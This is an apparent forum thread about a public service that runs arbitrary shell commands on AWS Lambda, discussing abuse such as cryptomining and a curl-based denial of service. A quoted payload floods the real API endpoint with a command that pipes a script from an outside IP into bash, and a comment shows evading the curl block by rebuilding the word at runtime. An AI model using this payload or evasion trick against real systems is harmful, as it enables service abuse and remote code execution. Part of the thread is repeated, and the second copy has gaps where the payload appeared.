I don't expect there to be any obvious privesc or interesting vulnerability... I'm curious to know what benmanns might have found, though.
If there is one, the author is quite cheeky, since that could allow him to crowdsource an AWS bug bounty :)
That said, getting RCE is usually really interesting because you can get access to the secrets and sensitive data that the app needs to run, but this app doesn't need anything interesting to run (besides the AWS token which can only log to cloudwatch). This means that the only resource that it's using is the compute and network itself.
The most obvious way to exploit this, would then be to mine cryptocurrencies, which won't be trivial due to the 3s task limit. It would still be doable by splitting the work into chunks doable in 3s, and making the payload re-entrant, just like the "curl DoS" that the author is currently attempting to block.
In fact, a hidden cryptominer and a DoS both have the goal of maximing resources usage :)
I noticed the "curl DoS" since now any curl command will fail due to the check that returns "blocking curl due to people just using it for stupid DoS - yes this is ghetto: will re-enable once I find a better method"
The payload is
for i in $(seq 1 2);
do
#echo 1 &
curl -v -X POST -H 'Content-Type: application/json' -d '{command: "curl 13.230.227.99/fk | bash"}' https://yypnj3yzaa.execute-api.us-west-1.amazonaws.com/dev &
done
Obviously, that's not enough to prevent such a DoS from happening: you can just recreate the curl string at runtime
e.g. `$(echo cu)rl http://httpbin.org/ip` still works, but we could also use Javascript and parametrize the payload with a random key (and a server could easily pick a different one at every request). The only way to detect it would then be to decode it by running the Javascript, which can still leave you exposed to other HTTP requests that you could make directly via node's http
All great points. Also realizing that it’s pretty easy to bypass my simple check but I needed something to temporarily pause the loop. I want to allow curl completely as that is in the default exec environment but I don’t know of a good way to prevent the basic ddos. Any ideas?
Any issues found I will recommend to the author to submit directly to amazon I will not be doing so. Also I will be adding a section to the site showing issues found so far with credits to finder.
If there is one, the author is quite cheeky, since that could allow him to crowdsource an AWS bug bounty :)
That said, getting RCE is usually really interesting because you can get access to the secrets and sensitive data that the app needs to run, but this app doesn't need anything interesting to run (besides the AWS token which can only log to cloudwatch). This means that the only resource that it's using is the compute and network itself.
The most obvious way to exploit this, would then be to mine cryptocurrencies, which won't be trivial due to the 3s task limit. It would still be doable by splitting the work into chunks doable in 3s, and making the payload re-entrant, just like the "curl DoS" that the author is currently attempting to block.
In fact, a hidden cryptominer and a DoS both have the goal of maximing resources usage :)
I noticed the "curl DoS" since now any curl command will fail due to the check that returns "blocking curl due to people just using it for stupid DoS - yes this is ghetto: will re-enable once I find a better method"
The payload is
Obviously, that's not enough to prevent such a DoS from happening: you can just recreate the curl string at runtimee.g. `$(echo cu)rl http://httpbin.org/ip` still works, but we could also use Javascript and parametrize the payload with a random key (and a server could easily pick a different one at every request). The only way to detect it would then be to decode it by running the Javascript, which can still leave you exposed to other HTTP requests that you could make directly via node's http
For example, I created this POC: https://gist.github.com/berdario/6161a1f9e4bc4d246bcd97379f9...
which will create a payload like:
Which you can execute by piping its output into sh again